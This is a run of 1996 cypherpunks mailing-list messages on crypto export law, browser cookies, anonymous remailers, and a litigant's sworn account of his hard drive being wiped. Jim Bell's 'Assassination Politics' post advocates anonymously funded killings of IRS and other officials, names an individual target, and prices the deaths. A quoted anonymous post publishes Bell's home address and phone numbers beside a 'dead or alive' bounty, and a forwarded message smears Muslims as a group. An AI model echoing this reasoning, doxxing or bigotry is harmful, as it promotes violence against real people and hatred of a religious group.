> Could you settle a dispute?  Is it, or Is it not, legal to take 
> PGP source code and the like out of the country if it is written on
> paper?

It is unclear.  Up until recently, there was never any restriction imposed
on taking code out of the country.  Technical papers are presented, the book
Applied Cryptography as explicitly allowed to be exported.

Then MIT came out with the PGP book.  The book contains the entire source, in a easy
to scan font.  I don't know for a fact, but it seems to me that it was designed
to push the line a little bit.

A CJR request was filed for the book.  There is a statutory requirement that the
response come back within some small number of weeks.  So far it's been over a
year, and while it has not been rejected, it has not been approved either.

So, it is unclear.  Check out Phil Karn's web page.  If you are interested in
just how far the gov't will go; how foolish they are willing to look; it's all there.

http://www.qualcomm.com/people/pkarn/export/index.html#govt

thad
-- Thaddeus Beier                     thad@hammerhead.com
   Technology Development                   408) 286-3376
   Hammerhead Productions        http://www.got.net/~thad 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 16 Feb 1996 13:55:56 +0800
To: "Sentient1" <Shade@cdale1.midwest.net>
Subject: Re: PGP
In-Reply-To: <199602160232.UAA04240@cdale1.midwest.net>
Message-ID: <199602160313.WAA27781@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"Sentient1" writes:
>       Could you settle a dispute?  Is it, or Is it not, legal to take 
> PGP source code and the like out of the country if it is written on 
> paper?

It appears to be legal, as MIT has done it. A written opinion has held
that other crypto sources can be taken out on paper, but no formal
opinion of the PGP sources in the MIT book has happened. It may only
be legal to take these sources out in the form of a published book,
however -- random printouts you do yourself may or may not be legal to
export since they don't qualify as "public domain" information.

In practice, of course, if you don't tell anyone and you arent someone
prominent you will never be caught no matter what you do.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Fri, 16 Feb 1996 13:50:52 +0800
To: cypherpunks@toad.com
Subject: Re: CDA Yes Votes; Collection
Message-ID: <199602160317.WAA04288@pipe11.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Feb 09, 1996 05:56:13, 'Duncan Frissell <frissell@panix.com>' wrote: 
 
 
> 
>If you are deeply upset by the high-handed manner in which the legislature

>has screwed around with your life, welcome to the club.  Every bill they 
>pass and every regulation upsets someone just as badly as you are upset. 
>That is why some of us want less legislation and less regulation to
minimize 
>just this sort of human suffering.  Maybe next time those of you who are 
>into "proactive" government will think before you crush other people's
lives. 
> 
>DCF 
> 
 
Isn't it the libertarian types on the list who are into mass killings of
civilians with nukes and the "socialist statists" who tend to oppose it? 
 
How does this square with your view that it is people into "'proactive'
government" who are "crush[ing] other people's lives?" 
 
It seems to me having your city nuked is a tad more likely to produce the
crushing. 
 
Normally, I would not be the first to post this onto cypherpunks, but since
*you* did I'm game for another seemingly off-topic discussion. 
 
--tallpaul




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@ATHENA.MIT.EDU>
Date: Fri, 16 Feb 1996 14:08:29 +0800
To: "Sentient1" <Shade@cdale1.midwest.net>
Subject: Re: PGP
In-Reply-To: <199602160232.UAA04240@cdale1.midwest.net>
Message-ID: <199602160330.WAA16481@charon.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain


>       Could you settle a dispute?  Is it, or Is it not, legal to take 
> PGP source code and the like out of the country if it is written on 
> paper?

This is a leading question.  If you just print it out, it might not be
legal to export.  If it is printed in a book (e.g., the PGP Sourcecode
Book, MIT Press, 1995) then it should be legal to take it out of the
country.  IANAL, YMMV.

Hope this helps.

-derek





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Charles Gimon <gimonca@skypoint.com>
Date: Fri, 16 Feb 1996 15:10:53 +0800
To: cypherpunks@toad.com
Subject: Trolling for Muslims during Ramadan
Message-ID: <Pine.SV4.3.91.960215221825.11158A-100000@mirage>
MIME-Version: 1.0
Content-Type: text/plain



Has the list really sunk this far into trolling? Obviously we're
starting to see dreck posted simply to draw people into fights.
If I want a religious war, I'll hang out in soc.culture.pakistan, 
thank you. <Insert Perrygram here.>

Oh, and for the still-clueless, posts like the following have 
about as much of a foundation in reality as your average Zundelsite.
Don't even bother replying.

 ***********************************************************************
        --The Interview--             | gimonca@skypoint.com
 George Clinton: "Suck on my soul,    | Minneapolis MN USA
 and I will lick your funky emotions!"| http://www.skypoint.com/~gimonca
 Dave Letterman: "Yuck!!"             | A lean, mean meme machine.
 ***********************************************************************

---------- Forwarded message ----------
Date: Thu, 15 Feb 1996 20:03:56 +0000 (GMT)
From: Sean Gabb <cea01sig@gold.ac.uk>
To: Ashfaq Rasheed <ashfaq@corp.cirrus.com>
Cc: tcmay@got.net, cypherpunks@toad.com
Subject: Re: Online Zakat Payment: Religious tithe.

True, there are risks in generalising from the actions of one individual 
to the group as a whole.  Nevertheless, where Islam is concerned, there 
are so many individuals behaving badly that we are justified in thinking 
the whole religion a force for bad.

Doubtless, I shall be told that "true Islam" is "true tolerance", "true 
freedom", and even "true apple pie".  I may be told that the horrors of 
actually existing Islam - remember this phrase, or something like it? - 
are all somehow the fault of the West.  But the fact is that most Moslems 
venerate old men in beards, who think that anyone who disagrees 
with them about God should be put to death, that a woman with a 
clitoris is a kind of devil, and that Western classical music is evil.

By my standards, these people are disgusting.  My only dispute with Tim 
is in our manner of expressing our disgust.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Deranged Mutant <wlkngowl@unix.asb.com>
Date: Sat, 17 Feb 1996 19:31:10 +0800
To: cypherpunks@toad.com
Subject: Re: Spin Control Alert (LI Newsday, 2/12/96)
In-Reply-To: <0l8IS0K00YUvFgy1tJ@andrew.cmu.edu>
Message-ID: <199602160334.WAA12990@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

BTW, the same insipid viewpoint from June Cleaver was printed in the 
Houston Chronicle on 2/11...
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMSP7YSoZzwIn1bdtAQHAxAF/RaG/tuyDazedDGz4rCtcDJD4e05CQf2d
tG+QGq896zlp83HhM9yxxuEMgsJc319D
=lfto
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 16 Feb 1996 16:56:15 +0800
To: cypherpunks@toad.com
Subject: Re:
Message-ID: <m0tnJmH-00091VC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:44 PM 2/14/96 -0800, anonymous-remailer@shell.portal.com wrote:
>>Meanwhile
>>        WANTED, DEAD OR ALIVE
>>        JIM BELL
>>        REWARD 13 demo-cyberbucks
>
>     Send your contributions to:
>
>         James D. Bell
>         7214 Corregidor Road
>         Vancouver, WA
>         (503) 696-3911
>         (503) 737-0284
>         (503) 737-0357
>
>>An assassination-sponsoring society is _not_ a polite society.
>
>The first rule of not being seen is "Don't stand up".

BTW, the last two telephone numbers are no longer active at my residence.  I
haven't tried them to see if they've already been assigned to other people.
I would have hoped that anybody who went through the limited research (they
well all listed telephone numbers, BTW; I've NEVER had an unlisted telephone
number) to find them would have  at least called to verify that they were no
longer valid numbers.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Defanged Fruit-Ant <wlkngowl@unix.asb.com>
Date: Sat, 17 Feb 1996 19:31:17 +0800
To: cypherpunks@toad.com
Subject: Re: Netscrape's Cookies
In-Reply-To: <3122F324.285@netscape.com>
Message-ID: <199602160341.WAA13022@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Jeff Weinstein wrote:
> Defanged Fruit-ant wrote:  (Hey, he called us Netscrape :-) )

Actually it would make a nice name for a web robot.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMSP83yoZzwIn1bdtAQEelwF/UGGWqSJFtwfy481DREcwLCNtFLPC1YOT
TdOTtw0k0QAAGaCMkgjiH6IeHsDuGVaw
=g33q
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Deranged Mutant <wlkngowl@unix.asb.com>
Date: Fri, 16 Feb 1996 14:36:17 +0800
To: cypherpunks@toad.com
Subject: Re: The Internet Party
Message-ID: <199602160347.WAA13058@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

jamesd@echeque.com wrote:
> At 01:01 PM 2/14/96 -0800, Brian D Williams wrote:
> >Why not form our own Party?
> >The Internet party........
> 
> No matter how excellent the people and the goals of such a party:
> such a party would be a first step to creating a world state.
> 
> Good intentions, dreadful consequences.

Bah. Instead we can have an Internet Party. No, not political party... I 
mean a nice world-wide baccanal... Hell of a lot more fun, anyway.

Bread & circus.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMSP+aSoZzwIn1bdtAQEGiQF8C46cp1jU+1zSNGUWYYJHYq3L/K9O+Gzo
IAYVTxL6ANiaebn+caUV4O8f5Er/gud3
=tJWO
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Deranged Mutant <wlkngowl@unix.asb.com>
Date: Fri, 16 Feb 1996 14:52:25 +0800
To: cypherpunks@toad.com
Subject: Re: Some thoughts on the Chinese Net
Message-ID: <199602160348.WAA13069@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I haven't been watching this thread much, but has anyone checked out the 
appropriate Chinese culture/politics newsgroups on this?
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMSP+pyoZzwIn1bdtAQHb7AGAyzWHyF23Gvt/i9Fbs9zQuPrck2fCEdK3
3BAT0lqJoquriMf1Ten4OhVQlJA4nzB9
=lWWG
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 16 Feb 1996 17:09:47 +0800
To: cypherpunks@toad.com
Subject: Re: Assassination Politics(tm) was V-chips, CC, and Motorcycle Helmets
Message-ID: <m0tnJxV-00091yC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 02:18 PM 2/15/96 -0800, Bill Frantz wrote:
>[I've changed the Subject: to more accurately reflect the contents]
>
>My purpose on this thread is to examine the limits of Jim Bell's idea of
>Assassination Politics.  My ground rules are to assume that it is a natural
>outgrowth of the technologies of anonymous cash and anonymous remailers. 
>As such arguments that it is immoral are only valid to the extent that they
>bare on individual's decisions to particpate in an assassination.

Pardon me, but the proper word is "bear", not "bare."

>
>I believe that we have general agreement that high government figures are
>not subject to sanction via assassination politics because they already
>enjoy Secret Service levels of protection.

You'd be surprised how few "high government officials" have 
Secret-service-type protection.  President, obviously, vice president, 
Speaker of house, majority and  minority leader of Senate, etc. "Ordinary" 
members of House and senate don't.  A few department heads probably do, but 
that is the exception, rather than the rule.

BTW, for the record, just a couple of days ago Clinton probably passed 
within a mile of my house, "Slant range", in a helicopter, with a day's 
warning.  (The term, "slant range", is a "term of art," for those not in the 
know.)

>I also believe that Jim and I disagree about the significance of Salmon
>Rushdie.  Jim thinks that the lack of anonymity in the Mullah's
>assassination bounty is repelling possible assassins.  I disagree.

Well, then what _IS_ "repelling possible assassins"?  Hint:  If I or you 
killed Rushdie, do you really believe you would be able to collect the 
reward?  I don't.  Unless you get people to really BELIEVE they can collect, 
then it is irrelevant what the value of that reward is!

Hint:  If the mullahs really wanted to see Rushdie dead, they would have 
implemented some sort of "Assassination Politics"-type system to ensure than 
anyone who wanted to collect the reward could do so from the comfort and 
safety of his own home.


>A
>question worth asking is, How much does it cost the British government to
>protect Mr. Rushdie by keeping his location secret and providing other
>unspecified protection.  If anyone knows the answer, it could help build an
>economic model of Assassination Politics.

Which is a valid goal.  Actually, it is unclear why Britain is spending the 
money to protect Rushdie.  Despite the fact that he's done nothing to 
deserve his targeting, governments are remarkably reticent about protecting 
individual citizens.  


>Jim Bell said:
>
>>Actually, I think the primary targets will be either the middle level 
>>manager types, or the ones who have attracted a substantial amount of bad 
>>publicity by "following orders."  Lon Horiuchi (the sniper who shot Vicki 
>>Weaver) for example, would be a excellent example of a person who'd try to 
>>claim, "I was just following orders."  Okay, maybe he was, but so was Adolph 
>>Eichmann.  
>
>I agree that Jim's idea of targeting certain specific individuals, such as
>the sniper above might work.

Now, imagine you were a government employee in this line of work, and a 
fellow employee was bumped off due to a well-publicized incident.  Next time 
you're asked to engage in a Waco-like operation, what do you think you'll 
say to  your manager?   "Is this trip necessary?"

This is called, "deterrence."

>>Once the tax collectors/enforcers were targeted, the rest of the government 
>>wouldn't be able to operate, and would collapse.
>
>However if you tackle the whole tax system, you get into problems of scale.
> The IRS alone (according to their web page) has over 110,000 employees,
>and we havn't even mentioned the state and local employees.  I don't think
>killing one or two will have a sigificant effect (that is occuring now).  I
>will assume that you have to successfully kill about 10% to have enough
>effect to shut off the government's money supply.

Needless to say, I disagree.  In practice, if you discovered that  each year 
there  was a 1% chance of you dying as a consequence of your job, you'd 
probably strongly consider changing your place of employment.

Now, I think statistics show that each year, about 800 billion dollars in  
individual income taxes are collected.  If we assume that the equivalent of 
only 1% of that  value  was donated to solve the "IRS problem," that's 8 
BILLION dollars, which at $10,000 per person would buy 800,000 deaths.  
THat's 7 times the current employment of the IRS.

You tell me:  What would the average person pay THIS YEAR to avoid paying, 
say, a $100,000 tax bill NEXT YEAR?  (Hint:  How much do rich people pay 
their accountants, TODAY, to avoid taxes?)

Another Hint:  Consider Bill Gates.  His wealth is variously estimated at 
over 10 BILLION dollars, probably almost all of which is in long-term 
capital gains (Microsoft stock), for which he will have to pay somewhere 
around 30% in Federal income taxes if he should choose to cash out.  He 
would be 1.5 Billion dollars ahead if he donated $1.5 billion dollars to an 
organization which would eliminate his  requirement to pay the total 3 
billion dollar tax bill to the IRS.  That alone is the equivalent of about 
$14,000 for each IRS employee.


>Attacks at this scale will be difficult because while people will have
>perfect anonymity in cyberspace, they won't enjoy it in physical space. 
>Neighbors, survalence cameras, etc.; in fact all the technology that makes
>privacy so hard to achieve today will be available to catch the assassins. 
>The police will also be more motivated to utilize the technology for this
>class of people than they would for drug dealers, pimps and other low
>lifes.  These points will tend to raise the price of assassinations.

That depends entirely on the identity of the target.  Besides, suppose for a 
moment that all these people are turned into "targets."  It's pretty easy to 
protect ONE INDIVIDUAL; it's far harder to protect thousands.

>Let us assume that we can buy assassinations for $50,000 per person.  Times
>11,000 people is $550 million dollars.  That is quite a sum.  I need to see
>an analysis which shows how to raise money on this scale.

Your estimate is way too high.   Remember, most of the cost of hiring a 
hitman is based on the risk (to him) of actually contacting and TRUSTING his 
contractor. (and vice versa:  The contractor has to trust the hitman.)   
While I have no firm statistics, I would  imagine that the vast 
majority of "contract killings" are  solved (if they are solved at  all, by 
the police) by something other   than evidence collected at the site where 
the killing actually occurred.  If you completely eliminate this risk, (by 
encryption and digital cash, etc.) by free-market principles the cost should 
drop drastically.

More generally, most murders are solved either by researching the prior 
relationships (and motives) of acquaintances of the "victim," or witnesses 
to an incident that the killer didn't expect to occur, etc.   "Assassination 
Politics" would result in a situation in which literally everybody in the 
world had an IDENTICAL motivation to kill the target.  Imagine explaining 
this away to a jury, who themselves might have had an equivalent motivation 
to collect the reward! 

Jim Bell
jimbell@pacifier.com

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMSQpBfqHVDBboB2dAQH94QP8Dgza+4vkvt6LWYXSMCcmT6TivD/A5XRU
/zwBUxm44I7670jsBDwTpaV/0o6TRC5E5behUctUJPIh4aietaUOVThsghmLBinE
HUwc7nRxhKsyUJkYuSLx8JIn4iV1muGtKFe8KeYgPIHYWuTq380WRd64/RtxbYjy
aXfYSsOfSZQ=
=FwQ+
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Fri, 16 Feb 1996 16:45:35 +0800
To: cypherpunks@toad.com
Subject: Re: Netscrape's Cookies
In-Reply-To: <9602151600.AA03535@cti02.citenet.net>
Message-ID: <312429DD.1729@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Jean-Francois Avon JFA Technologies, QC, Canada wrote:
> 
> Alex Strasheim <cp@proust.suba.com> said:
> 
> >The best answer would probably be to use the kind of pop-up messages you
> >get when you're going to submit a secure or insecure form.  "You're about
> >to send a cookie back to a web server, continue or abandon?"  "You're
> >about to send mail from a web page, do you want to do that?"  Give people
> >the ability to turn the messages off -- that way functionality isn't
> >impaired.
> 
> I find that a very good solution providing that the browser say:
> >"You're about to send a cookie...."
> Here, I would add:
> "... that contain the following information:"
> 
> (information list)
> 
> "... back to a web server, continue or abandon?"
> 
> Otherwise, it not as worse, but still in the same spirit as to
> sign a blank check to a stranger...

  The problem with this approach is that some sites are already obscuring
or encrypting their cookies.  I think our merchant system may even do it
for the user shopping basket.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wussery@slip.net
Date: Fri, 16 Feb 1996 22:51:27 +0800
Subject: Anonymous Posting FAQ'S Using Private Idaho
Message-ID: <4g0dpq$8u@slip.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I have created several FAQ'S that I hope will streamline the
creation and subsequent sending of postings or email using
Private Idaho. I would like any feedback, pro or con on the
usefulness of these documents. My goal throughout the writing
process was to make it as EASY as possible to set up an account
on alpha.c2.org. As most people know, subsequent to setting up
your account on the alpha server, one can post anonymously to
newsgroups and send anonymous email.

This by NO MEANS is the ONLY way to send anonymous mail, but is
a popular way of doing so. I was prompted to write these FAQ's
because of the amount of frustration that I experienced while
trying to setup my anonymous account. Hopefully others will have
an easier path, subsequent to reading my FAQ's. I have sent a
copy of these FAQ's to the author of Private Idaho and hope to
be hearing from him soon about any
glaring omissions or errors. Should you find any errors, please
point them out. It is most important that easy to use, step by
step documents be made available for the public. The consequence
of enabling individuals to easily set up an anonymous presence,
is the free flow of information and to be able to challenge a
"fact" or individual without hesitation or possible
repercussions. I hope my FAQ's will help in this regard.

The FAQ's can be found at:

http://www.slip.net/~wussery/pgp.html

While you're there, check out some of the other spots that have
caught my attention. Hope you enjoy, and don't forget to give
me
your feedback, pro or con.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMSNJDl4zaQ9yYVwNAQFCdAP/aKIOArRdihXpK9Q8wfILzxLXivTJ92Vy
Y6yXaDQtt/SF8NYc5FgkQ8qB/5qqFRUYIm/mEPWDWWhs68EapX2YjwZi5acFjbTT
kt905IHcsleDxxz2aL5NWH+2daKdOc0I7JNIioPg4YYlZ+2sr+/lnvWs9d6BClDV
+gHZZn4bLEY=
=zmAr
-----END PGP SIGNATURE-----


There's No Elevator To Success. You Have To Take The Stairs.
Remember:"You Can't Fake The Harvest", Stephen Covey
PGP ID 0x72615C0D
url:http://www.slip.net/~wussery
Compuserve:72567,2213




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Fri, 16 Feb 1996 14:47:17 +0800
To: cypherpunks@toad.com
Subject: Re: Online Zakat Payment: Religious tithe.
Message-ID: <199602160408.XAA12403@pipe11.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Why oh why am I getting the idea that "cypherpunks" would better be called
"cryptoauthoritarians." From murder-as-political-liberation, to the
universalization of the libertarians "feelings" onto everyone else in the
world, to the mass nuclear bombings of civilians to the mass nuclear
elimination of religions. 
 
My, my. For a group of people so uspet at taxes you certainly have faith in
the ability of private individuals to generate the capital for things like
the Manhattan Project and high-cost nuke delivery systems! 
 
On Feb 15, 1996 20:03:56, 'Sean Gabb <cea01sig@gold.ac.uk>' wrote: 
 
 
>True, there are risks in generalising from the actions of one individual  
>to the group as a whole.  Nevertheless, where Islam is concerned, there  
>are so many individuals behaving badly that we are justified in thinking  
>the whole religion a force for bad. 
> 
>Doubtless, I shall be told that "true Islam" is "true tolerance", "true  
>freedom", and even "true apple pie".  I may be told that the horrors of  
>actually existing Islam - remember this phrase, or something like it? -  
>are all somehow the fault of the West.  But the fact is that most Moslems 

>venerate old men in beards, who think that anyone who disagrees  
>with them about God should be put to death, that a woman with a  
>clitoris is a kind of devil, and that Western classical music is evil. 
> 
>By my standards, these people are disgusting.  My only dispute with Tim  
>is in our manner of expressing our disgust. 
> 
>Sean Gabb 
>Editor 
>Free Life. 
> 
 
 
I was wondering if S. Gabb, as a self-declared expert on Islam, if he might
explain the difference between the Sunni and Shi'ite sects, and the
respective size of each? 
 
I am also curious if he could point us to a single written example where he
or anyone else has ever been told the various things that he "doubtless"
will be told? 
 
In short, is this important history posted on cypherpunks, more libertarian
political demagogery,  or another J. Bell-like reference to the
universalization of the libertarian's feelings onto the rest of the world? 
 
--tallpaul 
  "Gentle Jesus 
  "Meek and mild 
  "Bless me 
  "While I nuke this child. 
  "But reassure'em 
  "As I wack'em 
  "I love their rights; 
  "I'll never tax'em."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Deranged Mutant <wlkngowl@unix.asb.com>
Date: Fri, 16 Feb 1996 15:01:39 +0800
To: cypherpunks@toad.com
Subject: Re: Remailers Pose Risk
Message-ID: <199602160423.XAA13295@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>    Computerworld, February 12, 1996, Front page:
> 
>    Stealth E-mail poses corporate security risk
> 
>    By Gary H. Anthes[..]
>    Anonymous remailers on the Internet are emerging as a
>    threat to national and corporate security, some experts
>    warn.

FNORD!
[..]
>    For corporate information systems managers, stealth E-mail
>    is especially troubling because it allows hackers to attack
>    systems, steal trade secrets and broadcast them worldwide
>    without leaving an audit trail for authorities to follow.

Dumpster-diving the corporate offices and mailing the results to the 
media doesn't leave much of an audit trail either. Perhaps a problem lies 
in their own security...

>    "Anonymous remailers have a lot of nasty potential," said
>    Stephen T. Kent, chief scientist for security technology at

So do kitchen knives or automobiles.
[..]
[..]
>    One snowy day last month, for example, about 25% of the
>    workforce at a defense contractor in Rockville, Md., went
>    home after they received a bogus E-mail message dismissing
>    them for the day. The message originated from an anonymous
>    remailer that allowed the user to impersonate a senior
>    company official.

Was that a remailer or simply forged mail?
>    Last year, the U.S. Supreme Court struck down an Ohio law
>    that required the authors of political posters and
>    pamphlets to identify themselves. "In the case of political
>    speach, you can't make people tell you who they are," said
>    Patrick Sullivan, executive director of the Computer Ethics
>    Institute in Washington.

BTW, "Docket 93-986 -- Decided April 19, 1995" from Cornell's Law site

[..]
>    "As in the case of smallpox, yellow fever, flu epidemics,
>    AIDS or malaria, it will take disasters before the public
>    may accept that some forms of restrictions on the
>    electronic freedom of speech and  that  privacy may be
>    worthwhile."FNORD!
[..]
>    Do's and don'tsAhem
>    Unethical or illegal uses of anonymous remailers:[..]
>    -  To violate copyright lawsScientology...
>    -  To encourage others to commit unethical or illegal
>       behaviorAhem. Illegal<>Unethical... it may be very ethical to violate some laws. 
And then again, so what about unethical? So what if an anonymous poster 
advocates adultury or pilfering paperclips from your employer...
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMSQGzCoZzwIn1bdtAQFw8wF/Ta61GbzPyYQR9CZPl7TEa6gA3O32OyLS
OqQeEA6k/Ehtd0TjCdMRRfsOOf6xfQ5w
=zBHu
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hkhenson@netcom.com (Keith Henson)
Date: Sat, 17 Feb 1996 05:21:08 +0800
To: cypherpunks@toad.com
Subject: (fwd) Fishman > Pest Control
Message-ID: <199602160751.XAA10419@netcom.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


I know there are services which can recover at least some of the data
on a formated disk.  Does anyone have a pointer to them?  Keith Henson

PS, Please reply by email.  I used to read this list, but it has been
some time since I was here.  I already asked the victum to quit using
the disk.  

Xref: netcom.com alt.religion.scientology:150246
Path: netcom.com!ix.netcom.com!netnews
From: xenu@ix.netcom.com(STEVEN FISHMAN )
Newsgroups: alt.religion.scientology
Subject: Fishman > Pest Control
Date: 15 Feb 1996 02:58:35 GMT
Organization: Netcom
Lines: 190
Message-ID: <4fu7gr$f07@cloner4.netcom.com>
NNTP-Posting-Host: ix-ftl5-11.ix.netcom.com
X-NETCOM-Date: Wed Feb 14  6:58:35 PM PST 1996

DECLARATION OF STEVEN FISHMAN

	1.	I, STEVEN FISHMAN, am a plaintiff and co-plaintiff along
with Dr. Uwe W. Geertz in the case before the Superior Court of the
State of
California, in and for the County Los Angeles, known as "Uwe Geertz and
Steven Fishman vs. Church of Scientology International et. al.", Case
Number BC 122 467.

	2.	On Thursday, February 8, 1996, I received a phone call from
a
woman in a mature voice who said she was from Sonny's Pest Control
Services.  She said that she was introducing her company to the
Sunshine
Ranches subdivision of Fort Lauderdale and offered me a free pest
control
spraying of both inside and outside the house, at no cost or
obligation.  As I
had not had a spraying done in five months due to my financial
situation, I
told her to send her representative to spray the house on Saturday
afternoon,
February 10, 1996.

	3.	On Saturday afternoon, about 3:00 P.M., two pest control
workers arrived at the house.  They introduced themselves as Eddie and
Amy,
and said they were from Sonny's Pest Control.  They were very clean cut
and
had canisters of pest control spray.  They both wore white shirts. 
Eddie had a
tie on, and Amy was wearing denim shorts.  Eddie shook my hand and told
me that Amy was his sister.  They were very friendly and knowledgeable
about pest control.  Eddie seemed genuinely concerned about my parrot,
and
said that the spray his company used would not hurt the bird, and also
began
describing three kinds of carpenter ants which his spray would contain.
 

	4.	Eddie began spraying the inside of the house and Amy
suggested
I show her which plants outside had the most ants.  She was also very
knowledgeable about plants and was very friendly and congenial.  She
was
smiling a lot and I found her attractive so we spoke for about ten
minutes
outside.

	5. 	We then went back inside and I told Eddie I liked their
work and
I would call them in a month if I were financially able to afford their
services
because I was currently looking for a job.  Eddie asked me to write
down his
phone number so I could call him.  I asked him for a business card but
he said
they were not ready yet.  Amy asked if I was pleased with their service
and I
said it was very well done.  I left a few minutes after they did to go
pick up
my daughter who was a hostess at the Renaissance Festival.

	6.	When I returned around 5:30 P.M., I turned on my computer
and
I found the screen blank except for the words c:\format c: and
underneath it
100% formatted.  Everything on my hard drive had been erased, including
the
rough drafts of my opposition motion to defendants' notice of motion to
quash service of process of David Miscavige and my opposition motion to
defendants' notice of motion and special motion to strike the second
amended
complaints of plaintiffs pursuant to C.C.P. § 425.16 (SLAPP Suit). 
Furthermore, all of my research, including my original complaint and
all of
my Internet files were simultaneously destroyed when my hard drive was
formatted.

	7.	I checked the house and nothing had been taken.  I had $ 40
in
my wallet which was on a table in plain view in my bedroom and nothing
was
stolen from out of it.  The sole purpose of these two pest control
sprayers was
to re-format my hard drive and render it impossible for me to send in
my
motions and also go on the Internet.  I also had important
correspondence on
my hard disk with the Internal Revenue Service about my effort to
overturn
the tax exempt status of the Church of Scientology, as well as letters
of
complaints to the Food and Drug Administration regarding the Church of
Scientology's Super VII E-Meter not being an approved device for the
treatment of mental illness, and my complete file on the criminal
activities of
Church officials including Defendant Eugene Ingram is now gone.

	8.	At no time did Eddie and Amy mention anything about
Scientology.  They only talked about pest control, my bird, and the
outdoor
plants and their services.  I tried calling the number Eddie gave me
but it was
not the number for Sonny's Pest Control Services, and the party who
answered it said she has had that number for many years and I reached a
trailer park near the Seminole Bingo on State Road 7.  The woman said
it was
a wrong number and she never heard of Eddie or Amy.

	9.	I had been working on the preparation of two motions for
the
Status Conference for nearly a month, doing legal research and typing
between 14 and 16 hours a day, without the benefit of legal help.  When
I lost
all of my data, I had chest pains and became physically sick and
depressed
for several days and I remained in bed.  All of the work I had done was
gone
and I was unable to locate these two people.

	10.	I cannot prove that these individuals were Scientologists
or
connected with the Office of Special Affairs.  I do not even have their
last
names or even know if Eddie and Amy are their correct first names.  I
never
thought of putting a password system on my computer because the only
two
people who use the computer are myself and my daughter Elysia.  I had
no
backup of my data.  

	11.	I called the Microsoft help line at (206) 646-5104 and
spoke to a
support engineer named David.  I explained to David what had happened,
and
he assigned my problem a task number 14803868, and told me to use a
recovery disk to get my DOS prompt back, so I could re-install Windows
and
the word processor software (Works for Windows).  I was finally able to
get
the word processor loaded on Tuesday evening at 11:23 P.M.  There was
no
time to re-write the opposition motions since the replies had to be in
the Court
file by Friday, February 16, 1996.

	12.	I am therefore joining with Dr. Geertz's two opposition
motions
because there is insufficient time to re-write my own opposition
motions, and
I do not want to ask the Court for a delay in order to prepare the
motions over
again, because I would have to pay a penalty for changing my
non-refundable
airline tickets for the Status Conference, which I can't afford.  

	13.	I just wanted the Court to take notice of what happened to
me as
I believe it was a deliberate attempt to sabotage my legal work, and/or
to
keep me off the Internet because I have been a vocal critic of the
Church of
Scientology on the newsgroup alt.religion.scientology and on the
